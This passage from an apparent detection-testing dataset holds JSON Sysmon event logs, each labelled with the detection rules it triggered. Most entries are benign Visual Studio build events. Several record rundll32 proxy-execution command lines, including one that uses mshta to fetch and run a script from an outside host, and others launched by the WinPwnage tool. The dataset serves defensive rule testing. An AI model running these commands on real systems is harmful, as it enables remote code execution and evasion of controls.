Studio\\2019\\Community\\MSBuild\\Current\\Bin\\MSBuild.exe","ProcessGuid":"00247C92-1749-6010-0000-0010348FD92E","ProcessId":2988,"RuleName":"","TargetFilename":"C:\\Users\\bouss\\source\\repos\\blabla\\blabla\\Debug\\blabla.tlog\\CL.command.1.tlog","UtcTime":"2021-01-26 13:21:14.363"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"LAPTOP-JU4M3I0E","Correlation":null,"EventID":11,"EventRecordID":2429140,"Execution_attributes":{"ProcessID":5272,"ThreadID":6060},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2021-01-26T13:21:14.399477Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","Suspicious PROCEXP152.sys File Created In TMP","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2021-01-26 13:21:14.394","Image":"C:\\Program Files (x86)\\Microsoft Visual Studio\\2019\\Community\\MSBuild\\Current\\Bin\\MSBuild.exe","ProcessGuid":"00247C92-1749-6010-0000-0010348FD92E","ProcessId":2988,"RuleName":"","TargetFilename":"C:\\Users\\bouss\\AppData\\Local\\Temp\\tmp5938b880d43743db91973c95f519f06b.tmp","UtcTime":"2021-01-26 13:21:14.394"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"LAPTOP-JU4M3I0E","Correlation":null,"EventID":11,"EventRecordID":2429141,"Execution_attributes":{"ProcessID":5272,"ThreadID":6060},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2021-01-26T13:21:14.425366Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","Suspicious PROCEXP152.sys File Created In TMP","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2021-01-26 13:21:14.394","Image":"C:\\Program Files (x86)\\Microsoft Visual Studio\\2019\\Community\\MSBuild\\Current\\Bin\\MSBuild.exe","ProcessGuid":"00247C92-1749-6010-0000-0010348FD92E","ProcessId":2988,"RuleName":"","TargetFilename":"C:\\Users\\bouss\\AppData\\Local\\Temp\\tmp5938b880d43743db91973c95f519f06b.tmp","UtcTime":"2021-01-26 13:21:14.395"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"LAPTOP-JU4M3I0E","Correlation":null,"EventID":11,"EventRecordID":2429142,"Execution_attributes":{"ProcessID":5272,"ThreadID":6060},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2021-01-26T13:21:14.425472Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","Suspicious PROCEXP152.sys File Created In TMP","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2021-01-26 13:21:14.396","Image":"C:\\Program Files (x86)\\Microsoft Visual Studio\\2019\\Community\\MSBuild\\Current\\Bin\\MSBuild.exe","ProcessGuid":"00247C92-1749-6010-0000-0010348FD92E","ProcessId":2988,"RuleName":"","TargetFilename":"C:\\Users\\bouss\\AppData\\Local\\Temp\\tmp19546d957b6e4d15b83f93a323d5f087.rsp","UtcTime":"2021-01-26 13:21:14.396"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"LAPTOP-JU4M3I0E","Correlation":null,"EventID":11,"EventRecordID":2429143,"Execution_attributes":{"ProcessID":5272,"ThreadID":6060},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2021-01-26T13:21:14.425565Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","Suspicious PROCEXP152.sys File Created In TMP","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2021-01-26 13:21:14.396","Image":"C:\\Program Files (x86)\\Microsoft Visual Studio\\2019\\Community\\MSBuild\\Current\\Bin\\MSBuild.exe","ProcessGuid":"00247C92-1749-6010-0000-0010348FD92E","ProcessId":2988,"RuleName":"","TargetFilename":"C:\\Users\\bouss\\AppData\\Local\\Temp\\tmp19546d957b6e4d15b83f93a323d5f087.rsp","UtcTime":"2021-01-26 13:21:14.396"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"LAPTOP-JU4M3I0E","Correlation":null,"EventID":11,"EventRecordID":2429144,"Execution_attributes":{"ProcessID":5272,"ThreadID":6060},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2021-01-26T13:21:14.425664Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2021-01-26 13:21:14.826","Image":"C:\\Program Files (x86)\\Microsoft Visual Studio\\2019\\Community\\MSBuild\\Current\\Bin\\MSBuild.exe","ProcessGuid":"00247C92-1749-6010-0000-0010348FD92E","ProcessId":2988,"RuleName":"","TargetFilename":"C:\\Users\\bouss\\source\\repos\\blabla\\blabla\\Debug\\blabla.tlog\\CL.write.1.tlog","UtcTime":"2021-01-26 13:21:14.852"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"LAPTOP-JU4M3I0E","Correlation":null,"EventID":11,"EventRecordID":2429148,"Execution_attributes":{"ProcessID":5272,"ThreadID":6060},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2021-01-26T13:21:14.871509Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2021-01-26 13:21:14.826","Image":"C:\\Program Files (x86)\\Microsoft Visual Studio\\2019\\Community\\MSBuild\\Current\\Bin\\MSBuild.exe","ProcessGuid":"00247C92-1749-6010-0000-0010348FD92E","ProcessId":2988,"RuleName":"","TargetFilename":"C:\\Users\\bouss\\source\\repos\\blabla\\blabla\\Debug\\blabla.tlog\\CL.write.1.tlog","UtcTime":"2021-01-26 13:21:14.853"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"LAPTOP-JU4M3I0E","Correlation":null,"EventID":11,"EventRecordID":2429149,"Execution_attributes":{"ProcessID":5272,"ThreadID":6060},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2021-01-26T13:21:14.871745Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2021-01-26 13:21:14.818","Image":"C:\\Program Files (x86)\\Microsoft Visual Studio\\2019\\Community\\MSBuild\\Current\\Bin\\MSBuild.exe","ProcessGuid":"00247C92-1749-6010-0000-0010348FD92E","ProcessId":2988,"RuleName":"","TargetFilename":"C:\\Users\\bouss\\source\\repos\\blabla\\blabla\\Debug\\blabla.tlog\\CL.read.1.tlog","UtcTime":"2021-01-26 13:21:14.853"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"LAPTOP-JU4M3I0E","Correlation":null,"EventID":11,"EventRecordID":2429150,"Execution_attributes":{"ProcessID":5272,"ThreadID":6060},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2021-01-26T13:21:14.871980Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2021-01-26 13:21:14.818","Image":"C:\\Program Files (x86)\\Microsoft Visual Studio\\2019\\Community\\MSBuild\\Current\\Bin\\MSBuild.exe","ProcessGuid":"00247C92-1749-6010-0000-0010348FD92E","ProcessId":2988,"RuleName":"","TargetFilename":"C:\\Users\\bouss\\source\\repos\\blabla\\blabla\\Debug\\blabla.tlog\\CL.read.1.tlog","UtcTime":"2021-01-26 13:21:14.854"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"LAPTOP-JU4M3I0E","Correlation":null,"EventID":11,"EventRecordID":2429151,"Execution_attributes":{"ProcessID":5272,"ThreadID":6060},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2021-01-26T13:21:14.872190Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2021-01-26 13:15:06.578","Image":"C:\\Program Files (x86)\\Microsoft Visual Studio\\2019\\Community\\MSBuild\\Current\\Bin\\MSBuild.exe","ProcessGuid":"00247C92-1749-6010-0000-0010348FD92E","ProcessId":2988,"RuleName":"","TargetFilename":"C:\\Users\\bouss\\source\\repos\\blabla\\blabla\\Debug\\blabla.tlog\\CL.command.1.tlog","UtcTime":"2021-01-26 13:21:14.855"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"LAPTOP-JU4M3I0E","Correlation":null,"EventID":11,"EventRecordID":2429152,"Execution_attributes":{"ProcessID":5272,"ThreadID":6060},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2021-01-26T13:21:14.872564Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2021-01-26 13:21:23.229","Image":"C:\\Program Files (x86)\\Microsoft Visual Studio\\2019\\Community\\Common7\\IDE\\devenv.exe","ProcessGuid":"00247C92-172A-6010-0000-00103C3DD02E","ProcessId":7664,"RuleName":"","TargetFilename":"C:\\Users\\bouss\\AppData\\Local\\Microsoft\\VSApplicationInsights\\vstelAIF-312cbd79-9dbb-4c48-a7da-3cc2a931cb70\\20210126132123_277b7688d03b431eb925a7d64307d79a.tmp","UtcTime":"2021-01-26 13:21:23.229"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"LAPTOP-JU4M3I0E","Correlation":null,"EventID":11,"EventRecordID":2429153,"Execution_attributes":{"ProcessID":5272,"ThreadID":6060},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2021-01-26T13:21:23.229964Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2021-01-26 13:21:23.302","Image":"C:\\Program Files (x86)\\Microsoft Visual Studio\\2019\\Community\\Common7\\IDE\\devenv.exe","ProcessGuid":"00247C92-172A-6010-0000-00103C3DD02E","ProcessId":7664,"RuleName":"","TargetFilename":"C:\\Users\\bouss\\AppData\\Local\\Microsoft\\VSApplicationInsights\\vstelAIF-312cbd79-9dbb-4c48-a7da-3cc2a931cb70\\20210126132123_dd350a9897114eee834fb0993b4dee7e.tmp","UtcTime":"2021-01-26 13:21:23.302"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"LAPTOP-JU4M3I0E","Correlation":null,"EventID":11,"EventRecordID":2429154,"Execution_attributes":{"ProcessID":5272,"ThreadID":6060},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2021-01-26T13:21:23.303639Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2021-01-26 13:21:23.305","Image":"C:\\Program Files (x86)\\Microsoft Visual Studio\\2019\\Community\\Common7\\IDE\\devenv.exe","ProcessGuid":"00247C92-172A-6010-0000-00103C3DD02E","ProcessId":7664,"RuleName":"","TargetFilename":"C:\\Users\\bouss\\AppData\\Local\\Microsoft\\VSApplicationInsights\\vstelf144292e-e3b2-4011-ac90-20e5c03fbce5\\20210126132123_195f3c1acef04eaeb6f67d3ff46e5958.tmp","UtcTime":"2021-01-26 13:21:23.305"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"LAPTOP-JU4M3I0E","Correlation":null,"EventID":11,"EventRecordID":2429155,"Execution_attributes":{"ProcessID":5272,"ThreadID":6060},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2021-01-26T13:21:23.305903Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2021-01-26 13:21:33.196","Image":"C:\\windows\\system32\\mmc.exe","ProcessGuid":"00247C92-EC0A-600F-0000-00100AEFCC2C","ProcessId":22932,"RuleName":"","TargetFilename":"C:\\Users\\bouss\\Downloads\\prebuildevent_visual_studio.evtx","UtcTime":"2021-01-26 13:21:33.197"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"LAPTOP-JU4M3I0E","Correlation":null,"EventID":11,"EventRecordID":2429156,"Execution_attributes":{"ProcessID":5272,"ThreadID":6060},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2021-01-26T13:21:33.197967Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Suspicious Rundll32 Activity"],"event":{"Event":{"EventData":{"CommandLine":"cmd.exe /C rundll32.exe javascript:\"\\..\\mshtml,RunHTMLApplication \";document.write();h=new%%20ActiveXObject(\"WScript.Shell\").run(\"mshta https://hotelesms.com/talsk.txt\",0,true);","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Users\\IEUser\\Desktop\\","Description":"Windows Command Processor","FileVersion":"6.1.7601.17514 (win7sp1_rtm.101119-1850)","Hashes":"SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"365ABB72-39CC-5CE3-0000-002096C70000","LogonId":"0xc796","ParentCommandLine":"\"cmd.exe\" /s /k pushd \"C:\\Users\\IEUser\\Desktop\"","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"365ABB72-4F8A-5CE3-0000-0010C5BB4800","ParentProcessId":3548,"ProcessGuid":"365ABB72-1A29-5CE4-0000-001054E32101","ProcessId":1532,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"IEWIN7\\IEUser","UtcTime":"2019-05-21 15:32:57.276"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":1,"EventRecordID":4125,"Execution_attributes":{"ProcessID":3416,"ThreadID":3496},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-05-21T15:32:57.286254Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Suspicious Rundll32 Activity"],"event":{"Event":{"EventData":{"CommandLine":"rundll32.exe javascript:\"\\..\\mshtml,RunHTMLApplication \";document.write();h=new%%20ActiveXObject(\"WScript.Shell\").run(\"mshta https://hotelesms.com/talsk.txt\",0,true);","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Users\\IEUser\\Desktop\\","Description":"Windows host process (Rundll32)","FileVersion":"6.1.7600.16385 (win7_rtm.090713-1255)","Hashes":"SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238","Image":"C:\\Windows\\System32\\rundll32.exe","IntegrityLevel":"High","LogonGuid":"365ABB72-39CC-5CE3-0000-002096C70000","LogonId":"0xc796","ParentCommandLine":"cmd.exe /C rundll32.exe javascript:\"\\..\\mshtml,RunHTMLApplication \";document.write();h=new%20ActiveXObject(\"WScript.Shell\").run(\"mshta https://hotelesms.com/talsk.txt\",0,true);","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"365ABB72-1A29-5CE4-0000-001054E32101","ParentProcessId":1532,"ProcessGuid":"365ABB72-1A29-5CE4-0000-00107BE42101","ProcessId":2920,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"IEWIN7\\IEUser","UtcTime":"2019-05-21 15:32:57.276"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":1,"EventRecordID":4126,"Execution_attributes":{"ProcessID":3416,"ThreadID":3496},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-05-21T15:32:57.286254Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","Suspicious PROCEXP152.sys File Created In TMP","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2019-05-12 13:30:46.181","Image":"c:\\python27\\python.exe","ProcessGuid":"365ABB72-1FF8-5CD8-0000-00102A342000","ProcessId":1332,"RuleName":"","TargetFilename":"C:\\Users\\IEUser\\AppData\\Local\\Temp\\ieframe.url","UtcTime":"2019-05-12 13:30:46.181"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":11,"EventRecordID":16387,"Execution_attributes":{"ProcessID":2032,"ThreadID":1996},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2019-05-12T13:30:46.181756Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Suspicious Rundll32 Activity"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Windows\\System32\\rundll32.exe\" ieframe.dll,OpenURL c:\\users\\ieuser\\appdata\\local\\temp\\ieframe.url","Company":"Microsoft Corporation","CurrentDirectory":"c:\\Users\\IEUser\\Downloads\\WinPwnage-master\\WinPwnage-master\\","Description":"Windows host process (Rundll32)","FileVersion":"6.1.7600.16385 (win7_rtm.090713-1255)","Hashes":"SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238","Image":"C:\\Windows\\System32\\rundll32.exe","IntegrityLevel":"High","LogonGuid":"365ABB72-1596-5CD8-0000-0020103A0100","LogonId":"0x13a10","ParentCommandLine":"python winpwnage.py -u execute -i 9 -p c:\\Windows\\system32\\cmd.exe","ParentImage":"C:\\Python27\\python.exe","ParentProcessGuid":"365ABB72-1FF8-5CD8-0000-00102A342000","ParentProcessId":1332,"ProcessGuid":"365ABB72-2006-5CD8-0000-0010A2862300","ProcessId":2960,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"IEWIN7\\IEUser","UtcTime":"2019-05-12 13:30:46.213"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":1,"EventRecordID":16388,"Execution_attributes":{"ProcessID":2032,"ThreadID":1996},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-05-12T13:30:46.400506Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Suspicious Rundll32 Activity"],"event":{"Event":{"EventData":{"CommandLine":"rundll32.exe url.dll,OpenURL file://C:/Windows/system32/calc.exe","Company":"Microsoft Corporation","CurrentDirectory":"c:\\Users\\IEUser\\Downloads\\WinPwnage-master\\WinPwnage-master\\","Description":"Windows host process (Rundll32)","FileVersion":"6.1.7600.16385 (win7_rtm.090713-1255)","Hashes":"SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238","Image":"C:\\Windows\\System32\\rundll32.exe","IntegrityLevel":"High","LogonGuid":"365ABB72-1596-5CD8-0000-0020103A0100","LogonId":"0x13a10","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" ","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"365ABB72-2006-5CD8-0000-0010E0912300","ParentProcessId":2936,"ProcessGuid":"365ABB72-208A-5CD8-0000-0010119B2400","ProcessId":3560,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"IEWIN7\\IEUser","UtcTime":"2019-05-12 13:32:58.167"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":1,"EventRecordID":16390,"Execution_attributes":{"ProcessID":2032,"ThreadID":1996},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-05-12T13:32:58.167195Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Suspicious Rundll32 Activity"],"event":{"Event":{"EventData":{"CommandLine":"rundll32.exe url.dll,FileProtocolHandler calc.exe","Company":"Microsoft Corporation","CurrentDirectory":"c:\\Users\\IEUser\\Downloads\\WinPwnage-master\\WinPwnage-master\\","Description":"Windows host process (Rundll32)","FileVersion":"6.1.7600.16385 (win7_rtm.090713-1255)","Hashes":"SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238","Image":"C:\\Windows\\System32\\rundll32.exe","IntegrityLevel":"High","LogonGuid":"365ABB72-1596-5CD8-0000-0020103A0100","LogonId":"0x13a10","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" ","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"365ABB72-2006-5CD8-0000-0010E0912300","ParentProcessId":2936,"ProcessGuid":"365ABB72-20B1-5CD8-0000-001064D62400","ProcessId":1844,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"IEWIN7\\IEUser","UtcTime":"2019-05-12 13:33:37.063"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":1,"EventRecordID":16391,"Execution_attributes":{"ProcessID":2032,"ThreadID":1996},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-05-12T13:33:37.078801Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Suspicious Rundll32 Activity"],"event":{"Event":{"EventData":{"CommandLine":"rundll32.exe url.dll,FileProtocolHandler file://C:/Windows/system32/calc.exe","Company":"Microsoft Corporation","CurrentDirectory":"c:\\Users\\IEUser\\Downloads\\WinPwnage-master\\WinPwnage-master\\","Description":"Windows host process (Rundll32)","FileVersion":"6.1.7600.16385 